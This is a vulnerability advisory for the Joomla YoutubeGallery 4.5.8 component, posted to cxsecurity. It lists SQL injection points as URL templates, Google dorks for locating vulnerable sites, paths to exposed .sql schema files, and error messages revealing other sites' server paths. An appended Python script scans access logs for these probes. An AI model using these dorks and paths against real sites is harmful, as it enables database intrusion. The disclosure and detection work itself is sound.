Joomla YoutubeGallery Components 4.5.8 Database Disclosure and SQL Injection

2019.01.18
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

########################################################################################

# Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database Disclosure and SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : joomlaboat.com
# Software Information Links : extensions.joomla.org/extension/youtube-gallery/
joomlaboat.com/en/youtube-gallery
# Software Download Link : joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip
# Software Vulnerable Source Codes : github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql
github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql
# Software Affected Versions : 4.5.8 and previous versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_youtubegallery''
inurl:''/administrator/components/com_youtubegallery/''
# Previous Version : 4.1.7 CVE Details => nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/
# CVE : CVE-2014-4960
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

########################################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=[ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection]

/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=[ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&listid=[ID-NUMBER]&themeid=[ID-NUMBER]'&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe=true&height=[ID-NUMBER]&width=[SQL Injection]

########################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
/administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql

########################################################################################

# Example Vulnerable Sites :
*************************

########################################################################################

# Example SQL Database Error :

Strict Standards: Only variables should be assigned by reference in /home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on line 51

Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID() should not be called statically, assuming $this from incompatible context in /home/medealab/public_html/senscience/components/com_youtubegallery/includes/misc.php on line 198

Warning: DOMDocument::load(http://gdata.youtube.com/feeds/api/videos/RLz2k-oAhPo) [domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410 Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components/com_youtubegallery/models/gallery.php on line 145

########################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

########################################################################################
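
For defenders, the request patterns and file paths listed in this advisory can be turned into an access-log check. The script below is an added example, not part of the original advisory or of the YoutubeGallery project; the expected parameter shapes, the "combined" log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Expected value shapes for the parameters the advisory lists as injection points.
# These shapes are assumptions about legitimate traffic; tune them per site.
ID = re.compile(r"[0-9]+")
EXPECTED = dict.fromkeys(("Itemid", "galleryid", "listid", "themeid", "height",
                          "width", "mycategory", "defaultvideo"), ID)
EXPECTED.update(videoid=re.compile(r"[A-Za-z0-9_-]{1,20}"),
                lang=re.compile(r"[A-Za-z]{2,3}(-[A-Za-z]{2})?"),
                tmpl=re.compile(r"[A-Za-z0-9_]+"))
COMPONENTS = {"com_youtubegallery", "com_easy_youtube_gallery"}
SQL_FILE = re.compile(r"/administrator/components/com_youtubegallery/sql/.*\.sql$", re.I)
# Apache/nginx "combined" format: client address, request target, status code.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client, finding, detail) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if SQL_FILE.search(url.path):
        # A 200 means the schema file was served: the web server needs a deny rule.
        return (client, "sql-file-served" if status == "200" else "sql-file-probe", url.path)
    params = parse_qsl(url.query, keep_blank_values=True)  # also decodes %27 to '
    if dict(params).get("option") not in COMPONENTS:
        return None
    for name, value in params:
        shape = EXPECTED.get(name)
        if shape and value and not shape.fullmatch(value):
            return (client, "malformed-parameter", f"{name}={value}")
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log: documentation-range addresses, no real hosts.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_youtubegallery&view=gallery&Itemid=48 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jan/2019:10:00:05 +0000] "GET /index.php?option=com_youtubegallery&view=gallery&Itemid=48%27 HTTP/1.1" 500 812',
    '198.51.100.7 - - [18/Jan/2019:10:00:09 +0000] "GET /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql HTTP/1.1" 200 2310',
    '203.0.113.5 - - [18/Jan/2019:10:01:30 +0000] "GET /site/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql HTTP/1.1" 403 199',
    '192.0.2.10 - - [18/Jan/2019:10:02:00 +0000] "GET /index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&videoid=abcDEF12345&tmpl=component HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `sql-file-served` finding is the one to act on first: it shows the component's `sql/` directory is readable over HTTP and should be blocked at the web server.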



Copyright 2024, cxsecurity.com